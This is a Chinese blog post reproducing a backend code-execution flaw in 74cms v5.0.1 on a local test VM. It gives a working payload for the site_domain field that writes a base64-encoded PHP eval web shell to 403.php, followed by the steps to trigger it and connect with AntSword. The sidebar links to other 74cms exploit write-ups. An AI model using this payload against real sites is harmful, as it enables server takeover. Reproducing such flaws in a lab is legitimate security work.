74cms v5.0.1 漏洞复现

最新推荐文章于 2024-06-26 17:02:06 发布
最新推荐文章于 2024-06-26 17:02:06 发布
阅读量3.1k 收藏 9
点赞数 1
分类专栏: 渗透测试 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_lang/article/details/124513778
版权

一、环境搭建

这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。
1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html
请添加图片描述
2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。
请添加图片描述
3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

OK,系统安装完成。

二、漏洞利用

1.登录后台以后,点击保存网站配置的同时用burpsuite抓包。
请添加图片描述
请添加图片描述
2.修改site_domain的内容,这里对内容进行base64加密:site_domain=‘,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgmX1BPU1QoJzEyMycpKTs/Pg==’)),’
请添加图片描述
3.这里等号需要URL编码

请添加图片描述
4.再次访问:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/url.php,使恶意语句成功执行。
请添加图片描述
5.一句话木马已被写入:
在这里插入图片描述

6.使用蚁剑连接:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/403.php
在这里插入图片描述
OK,连接成功,over。

成都残疾人驾校彭老师
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论
专栏目录
gamblingmaster2020#0day-1#74cms v5.0.1前台sql注入1
07-25
一、漏洞简介 二、漏洞影响 三、复现过程
74cms 骑士人才系统 v5.0.1 正式版
10-02
总的来说,74cms骑士人才系统v5.0.1正式版是一个功能完备、易于定制的人才招聘解决方案,适用于各类企业。通过其高效的执行、丰富的功能和灵活的设计,企业能够更好地管理和运营自己的招聘流程,吸引并留住优秀的...
74CMS漏洞复现
小小猪的博客
12-01 4145
74CMS漏洞复现 漏洞描述: 由于74CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 影响范围: 74CMS_v5.0.1 版本低于6.0.48 环境复现: 这里采用安鸾渗透实战平台的靶机 地址 漏洞复现: 访问http://www.whalwl.site:8019/index.php?m=home&a=assign_resume_tpl发现报错 访问 www.whalwl.site:8019/in..
74cms -v3.0 存储型xss 分析与复现
Au_Wind的博客
11-06 273
骑士cms3.0版本存储型xss分析复现
java 远程执行linux命令_Pikachu-RCE远程命令执行漏洞
weixin_39597323的博客
11-19 332
RCE:远程代码、命令执行漏洞给攻击者向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口,比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 如...
74cms v5.0.1存在远程连接命令/代码执行漏洞
qq_58091216的博客
05-14 710
由于小编最近在面试找工作,所以没有时间进行更新文章,先浅更一个任意代码执行漏洞。 1.打开127.0.0.1/74cms/upload/install.php进行安装 2.使用管理员账号登陆后台,点击保存网络配置并使用burpsuite抓包。 3.之后修改site_domain(<?php phpinfo();?> base64之PD9waHAgcGhwaW5mbygpOz8+),site_domain=',file_put_contents('403.php',base6
74cms漏洞寻找
wanderdjjs的博客
03-04 374
这也就意味着该靶场存在xss漏洞,显示结果说明是过滤了 测试是否能显示网站cookie值。2.打开浏览器,在界面输入:IP/74cms/upload/install。1.安装完小皮之后,打开根目录,将74cms文件拖进根目录。注册结束之后进入靶场内部,我们可以选择前端和后端。这里我们选择后端,输入之前的用户名密码 进入。# 仅仅是娱乐所写,文章不够严谨,请勿见怪。1.在个人区域界面,点击搜索区域。会显示本机的IP地址和token值。3.正常我们输入是没有反馈的。这也就意味着存在文件包含漏洞
74CMS 3.0 SQL注入漏洞后台
浅笑996的博客
03-26 2574
代码审计工具:seay CMS:74CMS3.0 一、 启动环境 1.双击运行桌面phpstudy.exe软件 2.点击启动按钮,启动服务器环境 二、代码审计 1.双击启动桌面Seay源代码审计系统软件 2.因为74CMS3.0源代码编辑使用GBK编辑,所以首先需要先将编码改成GBK 3.点击新建项目按钮,弹出对画框中选择(C:\phpStudy\WWW\74cms),点击确定 漏洞分析 4...
74CMS模版注入漏洞复现
sGanYu
04-15 1700
骑士cms人才系统,是一项基于php+mysql为核心开发的一套免费+开源业人才软件系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。 该漏洞影响版本: CMS < 6.0.48 漏洞复现 url: http://目标IP地址/index.php?m=home&a=assign_resume_tpl 以post方.
74cms5.0.1RCE漏洞环境源码
10-18
74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境74cms5.0.1RCE漏洞环境
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版.zip
07-16
骑士cms(74CMS)高效人才招聘系统 v5.0.1 正式版 更新日志  新增:后台增加跳转页面 新增:短信预警提醒,方便客户及时充值 新增:企业与个人账号通用 新增:未付费且登录的企业单独呈现,方便追踪客户 新增:...
YzmCMS轻量级开源CMS v5.0.1
10-11
YzmCMS是一款轻量级开源内容管理系统,它采用OOP(面向对象)方式自主开发的框架。基于PHP+Mysql架构,并采用MVC框架式开发的一款高效开源的内容管理系统,可运行在Linux、Windows、Mac
(环境搭建+复现)74CMS模版注入+文件包含getshell
daxi0ng的博客
12-22 3253
0x00 简介 骑士CMS人才招聘系统是基于PHP+MYSQL的免费网站管理系统源码,提供完善的人才招聘网站建设方案。 0x01 漏洞概述 骑士 CMS 官方发布安全更新,修复了一处远程代码执行漏洞。由于骑士 CMS 某些函数存在过滤不严格,攻击者通过构造恶意请求,配合文件包含漏洞可在无需登录的情况下执行任意代码,控制服务器。 0x02 影响版本 骑士 CMS < 6.0.48 0x03 环境搭建 1、下载最新版74cms。 https://www.74cms.com/downlo
74cms|骑士cms|开源招聘系统,数据结构
beyond__devil的博客
10-23 8317
这个可是我花了3、4天时间,详细总结的,不知道公布出来,官方应该也不会找我吧。74cms是一个开源的招聘系统,我研究了下系统、代码,总结了下数据结构,网上应该是没有的。 觉得好的点个赞,我这几天真的挺辛苦的。。。 74cms3.7数据结构统计:     config - 系统配置         id         name - 配置项         value - 值
74cms 6.0.20 getshell
m0_51377238的博客
12-16 304
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。软件具执行效率高、模板自由切换、后台管理功能方便等诸多优秀特点。http://serverName/index.php/模块/控制器/操作m参数表示模块,c参数表示控制器,a参数表示操作/方法,后面的表示其他GET参数。
渗透年入百万人才管理系统【附poc】
jijisaq的博客
03-25 783
骑士cms人才系统,是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才网站系统。全部代码都为骑士网络原创,有着完全的知识产权。凭借骑士网络的不断创新精神和认真的工作态度,骑士人才系统已成国内同类软件中的最好用的人才系统。由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。公众号:「吉吉说安全」,对我发消息【20240325】免费获取poc。
vulfocus——骑士cms任意代码执行(CVE-2020-35339)
m0_62063669的博客
09-17 927
5.访问shell地址:/Application/Home/Conf/config.php。骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。(不知道这里为什么没出现flag,然后在phpinfo找到flag)后台账号密码均为adminadmin。4.构造Payload验证漏洞存在。6.getshell (改包)3.在第三步进行抓包。2.找到后台登陆界面。
74cms 任意代码执行(CVE-2020-35339)
weixin_44047654的博客
11-22 1132
74cms 任意代码执行(CVE-2020-35339)
发布一个Yii2扩展把debug信息存储到MongoDB中
最新发布
yagas的专栏
06-26 312
本项目为yii2-debug的扩展,使用MongoDB对debug数据进行存储。如果使用Yii2进行多个应用的开发的话,把debug信息汇聚到一起可以方便查阅。
tesseract-ocr-w64-setup-v5.0.1
09-25
tesseract-ocr-w64-setup-v5.0.1是一个开源的OCR(光学字符识别)引擎,主要用于图像文字识别。OCR技术可以自动识别和提取图像中的文字信息,并将其转换成可编辑和可搜索的文本格式。tesseract-ocr-w64-setup-v5.0.1是tesseract的一个64位Windows版本的安装程序,提供了一个方便的方法来安装和配置tesseract OCR引擎。 通过安装tesseract-ocr-w64-setup-v5.0.1,用户可以在Windows系统上轻松地使用tesseract OCR引擎来处理图像中的文字。安装程序包含了预编译的二进制文件和必要的依赖库,使得用户无需自行编译和配置引擎。用户只需要运行安装程序,按照提示完成安装过程,并设置环境变量,就可以使用tesseract进行文字识别了。 tesseract-ocr-w64-setup-v5.0.1支持多种语言的文字识别,包括英语、中文、法语、德语等。用户可以通过设置语言参数来指定要识别的语言类型。该版本还提供了一些高级功能,如调整识别精度、处理多列文本、处理倾斜文字等。 总之,tesseract-ocr-w64-setup-v5.0.1是一个方便易用的OCR引擎安装程序,适用于64位Windows系统。用户可以通过安装该程序,并按照提示进行配置,轻松地利用tesseract进行图像文字识别,从而快速获取和处理图像中的文字信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成都残疾人驾校彭老师

你的 打赏将是我的进步的一大动

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值